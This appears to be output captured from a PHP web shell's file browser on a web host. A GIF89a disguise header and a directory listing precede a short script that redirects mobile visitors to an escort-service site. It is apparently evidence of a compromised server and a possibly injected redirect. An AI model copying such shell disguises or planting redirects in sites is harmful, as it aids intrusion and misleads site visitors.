GIF89a;
Direktori : /home/serb/public_html/lib/ |
Current File : /home/serb/public_html/lib/Mobile_Redirect.php |
<?php if($_REQUEST['m'] == 'no') { $_SESSION['Site_View'] = 'Desktop'; } if($_SESSION['Site_View'] != 'Desktop') { require_once 'Mobile_Detect.php'; $detect = new Mobile_Detect; // Check for any mobile device, excluding tablets. if ($detect->isMobile() && !$detect->isTablet()) { header("Location: http://m.escortservice.org/"); exit; } } ?>